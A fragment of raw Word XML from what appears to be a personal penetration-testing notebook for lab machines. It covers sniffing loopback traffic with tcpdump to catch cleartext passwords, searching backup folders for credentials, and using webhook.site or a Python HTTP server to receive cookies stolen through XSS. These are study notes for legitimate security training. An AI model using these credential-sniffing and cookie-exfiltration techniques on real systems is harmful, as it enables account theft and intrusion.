          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WARNING: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpdump cannot be run without sudo permissions. That is because it needs to set up</w:t>
      </w:r>
      <w:hyperlink r:id="rId922">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId923">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">raw sockets</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in order to capture traffic, which is a privileged operation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B67">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B68">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's try to capture traffic in and out of the loopback interface, then dump its content in ASCII using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-A</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter. Ultimately, we want to filter any traffic containing the "pass" keyword.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B69">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1790700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="494" name="image495.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image495.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId924"/>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2B6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="926"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo tcpdump -i lo -A | grep "pass"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B6B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B6C">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After a few seconds we are prompted with the root user's clear text credentials. Nice!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B6D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These two examples provide an entry point for the many avenues available when hunting for leaked credentials. Having covered the low-hanging fruit, next we'll explore how to escalate privileges via misconfigured file permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B6E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B6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70">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_116zzstzltry" w:id="382"/>
      <w:bookmarkEnd w:id="382"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl &amp; systemd enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B71">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B72">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure to run "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl --version</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to check to see if systemctl might have some vulnerabilities. This was the case for the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sau HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> retired Machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B73">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B74">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B75">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">systemd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: The actual daemon and backend system manager.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B76">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: A utility to interact with and manage systemd.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B77">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B7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79">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B7A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cb7ulme80ico" w:id="383"/>
      <w:bookmarkEnd w:id="383"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Backups</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B7B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B7C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It's a very good privilege escalation strategy to look at backups, since they often have readable versions of previous credentials, or important files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B7D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B7E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We saw this first hand in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX-A</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> when there was a /opt/backup folder that held credentials </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B7F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B80">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was also mentioned in the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tib3rius</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> course in the video Weak File Permissions </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B81">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /tmp, /var/backups</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /opt/backup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B82">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B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84">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B85">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B86">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B87">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rpgsh6ewelrm" w:id="384"/>
      <w:bookmarkEnd w:id="384"/>
      <w:hyperlink r:id="rId925">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">XSS (Cross-Site Scripting)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B88">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B89">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More can be found in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX 8.4. Cross-Site Scripting</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B8A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="538"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It actually is really comprehensive and looks good</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B8B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B8C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:hyperlink r:id="rId926">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">webhook.site</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to receive all the cookies that get sent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B8D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1879600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="335" name="image327.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image327.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId92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2B8E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="562"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IF YOU USE WEBHOOKS, MAKE SURE TO DO https, not http</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="562"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The underlined is where to find the URL to send it to. And then a new entry on the left will appear when someone sends a GET request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B90">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="562"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then you should see a cookie whenever someone sends a cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B91">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B92">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can set up python server to listen to requests:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="913"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m http.server 5000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B94">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="913"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-m</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag in Python stands for module. It tells Python to locate the specified module (in this case, http.server), and run it as a script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="913"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Python HTTP server gives access to the files in the current working directory (CWD) where the command is executed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B96">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="40" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_t73binu7bnrl" w:id="385"/>
      <w:bookmarkEnd w:id="385"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
